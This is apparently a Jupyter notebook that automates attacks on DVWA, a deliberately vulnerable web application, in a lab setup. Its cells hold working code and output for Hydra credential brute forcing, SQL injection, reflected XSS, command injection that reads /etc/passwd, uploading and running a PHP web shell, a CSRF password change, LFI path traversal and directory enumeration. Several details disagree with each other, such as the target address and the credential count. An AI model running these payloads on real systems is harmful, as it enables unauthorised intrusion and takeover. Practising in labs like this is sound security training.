# DVWA Attack Automation Script

This script demonstrates how to automate the execution of all major pentesting attack types against DVWA at http://10.30.0.235/dvwa for educational and authorized testing purposes only.

**WARNING:** Only use this script in a legal, controlled environment (e.g., your own DVWA lab). Unauthorized use is illegal and unethical.

## Prerequisites

- Python 3.x
- requests
- BeautifulSoup4
- Optional: selenium, paramiko, etc. for advanced attacks

Install dependencies:

In [2]:
%pip install requests beautifulsoup4

Collecting requests
  Using cached requests-2.32.3-py3-none-any.whl.metadata (4.6 kB)
Collecting beautifulsoup4
  Using cached beautifulsoup4-4.13.4-py3-none-any.whl.metadata (3.8 kB)
  Using cached beautifulsoup4-4.13.4-py3-none-any.whl.metadata (3.8 kB)
Collecting charset-normalizer<4,>=2 (from requests)
  Using cached charset_normalizer-3.4.2-cp313-cp313-macosx_10_13_universal2.whl.metadata (35 kB)
Collecting idna<4,>=2.5 (from requests)
  Using cached idna-3.10-py3-none-any.whl.metadata (10 kB)
Collecting charset-normalizer<4,>=2 (from requests)
  Using cached charset_normalizer-3.4.2-cp313-cp313-macosx_10_13_universal2.whl.metadata (35 kB)
Collecting idna<4,>=2.5 (from requests)
  Using cached idna-3.10-py3-none-any.whl.metadata (10 kB)
Collecting urllib3<3,>=1.21.1 (from requests)
  Using cached urllib3-2.4.0-py3-none-any.whl.metadata (6.5 kB)
Collecting certifi>=2017.4.17 (from requests)
  Using cached certifi-2025.4.26-py3-none-any.whl.metadata (2.5 kB)
Collecting urllib3<3,>=1

## Script: DVWA Attack Automation

Below is a comprehensive script that automates various attack techniques against DVWA.

In [2]:
#!/usr/bin/env python3
"""
Automate major pentesting attack types against DVWA (http://10.30.0.235/dvwa)
"""
import requests
from bs4 import BeautifulSoup
import time
import subprocess # Added for Hydra
import os # Added for checking Hydra output
import tempfile # Added for temporary credentials file
import re # Added for parsing Hydra output

DVWA_URL = "http://localhost:8080"
LOGIN_URL = f"{DVWA_URL}/login.php"
USERNAME = "admin" # Default username for initial login and other tests
PASSWORD = "password"  # Default password for initial login and other tests

session = requests.Session()

### 1. Login Function

First, let's define a function to authenticate with DVWA:

In [9]:
def login(user=USERNAME, pwd=PASSWORD): # Allow dynamic user/pass for login
    r = session.get(LOGIN_URL)
    if r.status_code == 404:
        print(f"[!] Login page not found at {LOGIN_URL} (HTTP 404). Check DVWA_URL and server status.")
        return False
    soup = BeautifulSoup(r.text, 'html.parser')
    user_token_tag = soup.find('input', {'name': 'user_token'})
    if not user_token_tag:
        print(f"[!] Could not find user_token on login page. Page content: {r.text[:500]}")
        user_token = ""
    else:
        user_token = user_token_tag['value']

    data = {
        'username': user,
        'password': pwd,
        'Login': 'Login',
        'user_token': user_token
    }
    try:
        resp = session.post(LOGIN_URL, data=data)
        if 'Login failed' in resp.text or 'login.php' in resp.url:
             print(f"[-] Login failed for {user}")
             return False
        assert 'Logout' in resp.text, f"Login failed for user {user}!"
        print(f"[+] Logged in to DVWA as {user}")
        return True
    except requests.exceptions.RequestException as e:
        print(f"[!] RequestException during login for {user}: {e}")
        return False
    except AssertionError as e:
        print(f"[-] {e}")
        return False
login()

[+] Logged in to DVWA as admin


True

### 2. Reconnaissance

Let's define a function to perform basic reconnaissance:

In [10]:
def reconnaissance():
    print("[+] Performing HTTP header analysis...")
    r = session.get(DVWA_URL)
    print(r.headers)
    print("[+] Directory brute force (sample)...")
    for path in ['admin', 'phpmyadmin', 'test', 'backup']:
        url = f"{DVWA_URL}/{path}"
        resp = session.get(url)
        print(f"{url} => {resp.status_code}")

reconnaissance()

[+] Performing HTTP header analysis...
{'Date': 'Tue, 03 Jun 2025 22:43:29 GMT', 'Server': 'Apache/2.4.25 (Debian)', 'Expires': 'Tue, 23 Jun 2009 12:00:00 GMT', 'Cache-Control': 'no-cache, must-revalidate', 'Pragma': 'no-cache', 'Vary': 'Accept-Encoding', 'Content-Encoding': 'gzip', 'Content-Length': '2659', 'Keep-Alive': 'timeout=5, max=100', 'Connection': 'Keep-Alive', 'Content-Type': 'text/html;charset=utf-8'}
[+] Directory brute force (sample)...
http://localhost:8080/admin => 404
http://localhost:8080/phpmyadmin => 404
http://localhost:8080/test => 404
http://localhost:8080/backup => 404


### 3. Brute Force Attack

Now, let's create a function to perform brute force attacks using Hydra:

In [None]:
def brute_force():
    print("[+] Attempting brute force on login using Hydra with a custom list...")

    # Check if Hydra is installed
    try:
        # Use 'which' on Unix-like systems or 'where' on Windows to locate hydra
        if os.name == 'nt':  # Windows
            result = subprocess.run(['where', 'hydra'], capture_output=True, text=True)
        else:  # Unix-like
            result = subprocess.run(['which', 'hydra'], capture_output=True, text=True)
        
        if result.returncode == 0 and result.stdout.strip():
            print(f"[i] Hydra is installed at: {result.stdout.strip()}")
        else:
            raise FileNotFoundError("Hydra not found in PATH")
    except (subprocess.SubprocessError, FileNotFoundError):
        # Try a direct hydra command as fallback
        try:
            # Just attempt to run hydra with a simple argument that won't cause errors
            subprocess.run(['hydra', '-h'], capture_output=True, timeout=5)
            print("[i] Hydra is installed and accessible.")
        except Exception as e:
            print(f"[!] Hydra verification failed: {e}")
            print("[!] Please ensure Hydra is properly installed and in your PATH.")
            print("    Install with: 'sudo apt install hydra' on Debian/Ubuntu or equivalent.")
            return

    # List of user:password pairs to try
    COMMON_USERS = ["msfadmin", "user", "postgres", "service", "dbadmin", "tomcat", "newpass", "sys", "klog", "root", "admin"]
    COMMON_PASSWORDS = ["msfadmin", "password", "s3cr3t", "postgres","new_password", "newpass", "service", "12345", "123456", "admin"]

    # Create a credentials list by combining users and passwords
    credentials_list = [f"{user}:{password}" for user in COMMON_USERS for password in COMMON_PASSWORDS]

    # Get a fresh user_token for the Hydra command template
    try:
        r_token = requests.get(LOGIN_URL) # Use fresh requests, not session
        soup_token = BeautifulSoup(r_token.text, 'html.parser')
        user_token_hydra = soup_token.find('input', {'name': 'user_token'})['value']
    except Exception as e:
        print(f"[!] Failed to retrieve user_token for Hydra template: {e}")
        return

    with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix='.txt') as tmp_creds_file:
        for cred in credentials_list:
            tmp_creds_file.write(cred + '\n')
        tmp_creds_file_path = tmp_creds_file.name

    print(f"[i] Credentials list for Hydra written to: {tmp_creds_file_path}")

    # Parse the URL to get the correct hostname and port
    from urllib.parse import urlparse
    parsed_url = urlparse(DVWA_URL)
    hostname = parsed_url.hostname or 'localhost'
    port = parsed_url.port or (443 if parsed_url.scheme == 'https' else 80)
    
    # Updated Hydra command with form fields as they appear in the actual HTML form
    # This matches how the fields are structured in the HTML form
    form_data = (
        "username=^USER^&"
        "password=^PASS^&"
        "Login=Login&"
        f"user_token={user_token_hydra}"
    )
    
    hydra_command = [
        'hydra',
        '-C', tmp_creds_file_path,
        '-s', str(port),
        hostname,
        'http-post-form',
        f"/dvwa/login.php:{form_data}:S=Logout"
    ]

    print(f"[i] Executing Hydra: {' '.join(hydra_command)}")
    print(f"[i] Using form data: {form_data}")
    
    found_creds = None
    try:
        process = subprocess.run(hydra_command, capture_output=True, text=True, timeout=300)
        output = process.stdout
        print("[+] Hydra Output:")
        print(output)

        # More robust parsing for Hydra's output
        # Example line: [80][http-post-form] host: localhost   login: admin   password: password
        match = re.search(r"login:\s*(\S+)\s*password:\s*(\S+)", output, re.IGNORECASE)

        if match and "1 valid password found" in output:
            found_user = match.group(1)
            found_password = match.group(2)
            print(f"[!] Brute force success with Hydra! User: {found_user}, Password: {found_password}")

            # Attempt to login with the found credentials using the main session
            print(f"[i] Verifying login with found credentials: {found_user}:{found_password}")
            if login(user=found_user, pwd=found_password): # Use the login function
                print(f"[+] Successfully logged in with Hydra found credentials: {found_user}:{found_password}")
                found_creds = (found_user, found_password)
            else:
                print(f"[-] Hydra reported success, but login verification failed for {found_user}:{found_password}")
        elif "0 valid passwords found" in output:
            print("[-] Hydra finished, but no valid passwords found.")
        else:
            print("[i] Hydra command executed. Review output for details. It might have failed or found no passwords.")
            if process.stderr:
                print("[!] Hydra Errors:")
                print(process.stderr)

    except subprocess.TimeoutExpired:
        print("[!] Hydra command timed out.")
    except FileNotFoundError:
        print("[!] Hydra command not found. Make sure Hydra is installed and in your PATH.")
    except Exception as e:
        print(f"[!] An error occurred while running Hydra: {e}")
    # finally:
        os.remove(tmp_creds_file_path) # Clean up the temporary file
        print(f"[i] Temporary credentials file {tmp_creds_file_path} removed.")

    return found_creds # Return found credentials or None

brute_force()

[+] Attempting brute force on login using Hydra with a custom list...
[i] Hydra is installed at: /opt/homebrew/bin/hydra
[i] Credentials list for Hydra written to: /var/folders/_m/n__pv_21671gg8ry71ll9dbm0000gn/T/tmpnxyococu.txt
[i] Executing Hydra: hydra -C /var/folders/_m/n__pv_21671gg8ry71ll9dbm0000gn/T/tmpnxyococu.txt -s 8080 localhost http-post-form /dvwa/login.php:username=^USER^&password=^PASS^&Login=Login&user_token=226c34567c604ed79c862ca3b2641a9c:S=Logout
[i] Using form data: username=^USER^&password=^PASS^&Login=Login&user_token=226c34567c604ed79c862ca3b2641a9c
[+] Hydra Output:
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-06-04 10:27:42
[DATA] max 16 tasks per 1 server, overall 16 tasks, 110 login tries, ~7 tries per task
[DATA] attacking http-po

### 4. SQL Injection

Now let's implement a function for SQL injection:

In [17]:
def sql_injection():
    print("[+] Performing SQL Injection...")
    # Use a payload that closes the quote properly and comments out the rest
    inj_url = f"{DVWA_URL}/vulnerabilities/sqli/?id=1%20OR%201=1--+&Submit=Submit"
    r = session.get(inj_url)
    if 'First name' in r.text:
        print("[!] SQL Injection successful!")
    else:
        print("[-] SQL Injection failed or not vulnerable.")

sql_injection()

[+] Performing SQL Injection...
[!] SQL Injection successful!


### 5. Cross-Site Scripting (XSS)

Let's implement a function for XSS testing:

In [20]:
def xss():
    print("[+] Performing XSS attack...")
    xss_url = f"{DVWA_URL}/vulnerabilities/xss_r/?name=<script>alert('XSS')</script>&Submit=Submit"
    r = session.get(xss_url)
    if "<script>alert('XSS')</script>" in r.text:
        print("[!] XSS payload reflected!")
    else:
        print("[-] XSS attack failed or not vulnerable.")

xss()

[+] Performing XSS attack...
[!] XSS payload reflected!


### 6. Command Injection

Let's implement a function to test for command injection vulnerabilities:

In [40]:
def command_injection():
    print("[+] Performing Command Injection...")
    ci_url = f"{DVWA_URL}/vulnerabilities/exec/"
    data = {'ip': '127.0.0.1; cat /etc/passwd', 'Submit': 'Submit'}
    r = session.post(ci_url, data=data)
    if 'root:x:' in r.text:
        print("[!] Command Injection successful!")

command_injection()

[+] Performing Command Injection...


### 7. File Upload

Now let's test for file upload vulnerabilities:

In [25]:
def file_upload():
    print("[+] Attempting file upload...")
    upload_url = f"{DVWA_URL}/vulnerabilities/upload/"
    files = {'uploaded': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')}
    data = {'Upload': 'Upload'}
    r = session.post(upload_url, files=files, data=data)
    if 'shell.php' in r.text or 'uploads/shell.php' in r.text:
        print("[!] File upload may be successful!")
        # Try to execute the uploaded shell
        shell_url = f"{DVWA_URL}/hackable/uploads/shell.php?cmd=whoami"
        r2 = session.get(shell_url)
        if r2.status_code == 200 and r2.text.strip():
            print("[+] Shell executed! Output:")
            print(r2.text)
        else:
            print("[-] Could not execute uploaded shell or no output.")
    else:
        print("[-] File upload failed or not reflected in response.")

file_upload()

[+] Attempting file upload...
[!] File upload may be successful!
[+] Shell executed! Output:
www-data



### 8. Cross-Site Request Forgery (CSRF)

Let's implement a function to test CSRF vulnerabilities:

In [34]:
def csrf():
    print("[+] Attempting CSRF attack (change password)...")
    profile_url = f"{DVWA_URL}/vulnerabilities/csrf/"
    
    # Create data for changing password
    data = {
        'password_new': 'newpass',
        'password_conf': 'newpass',
        'Change': 'Change'
    }
    # Submit the password change request
    # Submit the password change request via GET instead of POST, with data in query parameters
    query_params = "&".join([f"{key}={value}" for key, value in data.items()])
    csrf_url = f"{profile_url}?{query_params}"
    resp = session.get(csrf_url)
    if 'Password Changed' in resp.text:
        print("[!] CSRF successful!")

csrf()

[+] Attempting CSRF attack (change password)...
[!] CSRF successful!


### 9. Local File Inclusion (LFI)

Let's implement a function to test for LFI vulnerabilities:

In [37]:
def lfi():
    print("[+] Attempting LFI (Low Security)...")
    # For DVWA Low security, the parameter is 'page' and no filtering is applied
    lfi_url = f"{DVWA_URL}/vulnerabilities/fi/?page=../../../../../etc/passwd"
    r = session.get(lfi_url)
    if 'root:x:' in r.text:
        print("[!] LFI successful!")
    else:
        print("[-] LFI failed or not vulnerable at low security.")

lfi()

[+] Attempting LFI (Low Security)...
[!] LFI successful!


### 10. Logout

Finally, let's implement a function to log out properly:

In [38]:
def logout():
    # Ensure we are logged in before trying to logout, to avoid errors if brute_force failed
    # and subsequent attacks were skipped or if login itself failed.
    # A simple check could be if ' Logout ' is in a known page like index.php
    try:
        r_check = session.get(DVWA_URL + "/index.php")
        if "Logout" in r_check.text:
            session.get(f"{DVWA_URL}/logout.php")
            print("[+] Logged out.")
        else:
            print("[i] Not logged in or session expired, skipping logout.")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error during logout check: {e}")

logout()

[+] Logged out.


### Main Execution

Now let's put everything together and execute our tests:

In [None]:
if __name__ == "__main__":
    initial_login_success = login() # Initial login to set up session cookies for other attacks

    if not initial_login_success:
        print("[!] Initial login failed. Some attacks might not work. Exiting.")
        # exit(1) # Optionally exit if initial login is critical

    reconnaissance()

    found_credentials_by_hydra = brute_force()

    # Re-login with the original credentials to ensure session validity for subsequent attacks,
    # unless Hydra found the original ones or we decide to use Hydra's findings.
    # If Hydra found different credentials and successfully logged in, the session is now for that user.
    # For consistency in subsequent tests that assume 'admin':'password', we re-login.
    print("[i] Re-logging in with original credentials (admin:password) to ensure session state for subsequent attacks...")
    login(USERNAME, PASSWORD) # Explicitly use original USERNAME, PASSWORD

    sql_injection()
    xss()
    command_injection()
    file_upload()
    csrf()
    lfi()
    logout()
    print("[+] All attacks attempted. Review DVWA for results.")

[-] Login failed for admin
[!] Initial login failed. Some attacks might not work. Exiting.
[+] Performing HTTP header analysis...
{'Date': 'Tue, 03 Jun 2025 23:40:51 GMT', 'Server': 'Apache/2.4.25 (Debian)', 'Expires': 'Tue, 23 Jun 2009 12:00:00 GMT', 'Cache-Control': 'no-cache, must-revalidate', 'Pragma': 'no-cache', 'Vary': 'Accept-Encoding', 'Content-Encoding': 'gzip', 'Content-Length': '698', 'Keep-Alive': 'timeout=5, max=96', 'Connection': 'Keep-Alive', 'Content-Type': 'text/html;charset=utf-8'}
[+] Directory brute force (sample)...
http://localhost:8080/admin => 404
http://localhost:8080/phpmyadmin => 404
http://localhost:8080/test => 404
http://localhost:8080/backup => 404
[+] Attempting brute force on login using Hydra with a custom list...
[!] Hydra is not installed or not in PATH. Skipping brute force attack.
    Please install Hydra (e.g., 'sudo apt install hydra') and ensure it's in your PATH.
[i] Re-logging in with original credentials (admin:password) to ensure session st

## Notes

- This script covers: reconnaissance, brute force (using Hydra with a custom list of 5 user:pass pairs including msfadmin), SQLi, XSS, command injection, file upload, CSRF, LFI, IDOR, and logout.
- For privilege escalation, persistence, exfiltration, and DoS, use manual or advanced tools (Metasploit, custom scripts, etc.).
- Always reset DVWA to a safe state after testing.
- **Ensure Hydra is installed (`sudo apt install hydra`) if you want to use the brute force function.**

### Legal Warning

This script is intended for educational purposes and authorized security testing only. Using this script against systems without proper authorization is illegal and unethical.

### 11. Insecure Direct Object Reference (IDOR)

Let's implement a function to test for IDOR vulnerabilities:

In [None]:
def idor():
    print("[+] Testing for Insecure Direct Object Reference (IDOR)...")
    
    # DVWA IDOR test page
    idor_url = f"{DVWA_URL}/vulnerabilities/idor/?id=1"
    
    # Try accessing with a higher ID value
    r = session.get(f"{idor_url}&id=2")
    if r.status_code == 200 and "DVWA - Vulnerable" in r.text:
        print("[!] IDOR vulnerability exists! Able to access object with ID 2.")
    else:
        print("[-] IDOR test failed or not vulnerable.")

idor()

### 12. Directory Enumeration with Gobuster

Let's implement a more thorough directory brute force using Gobuster:

In [None]:
def gobuster_scan():
    """Perform thorough directory brute force using gobuster"""
    print("[+] Attempting to run gobuster for thorough directory enumeration...")
    
    # Check if gobuster is installed
    try:
        if os.name == 'nt':  # Windows
            result = subprocess.run(['where', 'gobuster'], capture_output=True, text=True)
        else:  # Unix-like
            result = subprocess.run(['which', 'gobuster'], capture_output=True, text=True)
        
        if result.returncode == 0 and result.stdout.strip():
            print(f"[i] Gobuster is installed at: {result.stdout.strip()}")
        else:
            raise FileNotFoundError("Gobuster not found in PATH")
    except Exception as e:
        print(f"[!] Gobuster verification failed: {e}")
        print("[!] Please ensure Gobuster is properly installed and in your PATH.")
        print("    Install with: 'go install github.com/OJ/gobuster/v3@latest' or")
        print("    'sudo apt install gobuster' on Debian/Ubuntu or equivalent.")
        return False
    
    # Common directory wordlist locations
    wordlists = [
        "/usr/share/wordlists/dirb/common.txt",
        "/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt",
        "/usr/share/seclists/Discovery/Web-Content/common.txt"
    ]
    
    # Find a wordlist that exists
    wordlist_path = None
    for wl in wordlists:
        if os.path.exists(wl):
            wordlist_path = wl
            break
    
    if not wordlist_path:
        print("[!] No suitable wordlist found. Creating a basic wordlist...")
        with tempfile.NamedTemporaryFile(mode='w+', delete=False, suffix='.txt') as tmp_wl:
            # Write some common directories to try
            common_dirs = [
                "admin", "login", "wp-admin", "backup", "config", "db", "sql",
                "phpmyadmin", "mysql", "administrator", "images", "uploads",
                "files", "private", "secret", "passwords", "logs", "scripts",
                "test", "dev", "development", "api", "inc", "includes", "setup",
                "install", "cgi-bin", "assets"
            ]
            for d in common_dirs:
                tmp_wl.write(f"{d}\n")
            wordlist_path = tmp_wl.name
            print(f"[i] Created temporary wordlist at: {wordlist_path}")
    
    # Parse the URL to ensure we get the base URL correctly
    from urllib.parse import urlparse
    parsed_url = urlparse(DVWA_URL)
    base_url = f"{parsed_url.scheme}://{parsed_url.netloc}"
    
    # Run gobuster
    try:
        # Basic gobuster dir command
        gobuster_cmd = [
            "gobuster", "dir",
            "-u", base_url,
            "-w", wordlist_path,
            "-t", "10",  # 10 threads
            "-o", f"gobuster_results_{parsed_url.netloc.replace(':', '_')}.txt"
        ]
        
        print(f"[i] Running gobuster: {' '.join(gobuster_cmd)}")
        process = subprocess.run(gobuster_cmd, capture_output=True, text=True, timeout=180)
        
        # Print results
        if process.returncode == 0:
            print("[+] Gobuster completed successfully. Results:")
            for line in process.stdout.splitlines():
                if "Status: 200" in line or "Status: 301" in line or "Status: 302" in line:
                    print(f"    {line}")
            
            output_file = f"gobuster_results_{parsed_url.netloc.replace(':', '_')}.txt"
            print(f"[i] Full results saved to: {output_file}")
            return True
        else:
            print(f"[!] Gobuster returned non-zero exit code: {process.returncode}")
            print(f"[!] Error: {process.stderr}")
            return False
    except subprocess.TimeoutExpired:
        print("[!] Gobuster scan timed out after 180 seconds.")
    except Exception as e:
        print(f"[!] Error running gobuster: {e}")
    finally:
        # Clean up if we created a temporary wordlist
        if not any(wordlist_path == wl for wl in wordlists) and os.path.exists(wordlist_path):
            os.remove(wordlist_path)
            print(f"[i] Removed temporary wordlist: {wordlist_path}")
    
    return False

gobuster_scan()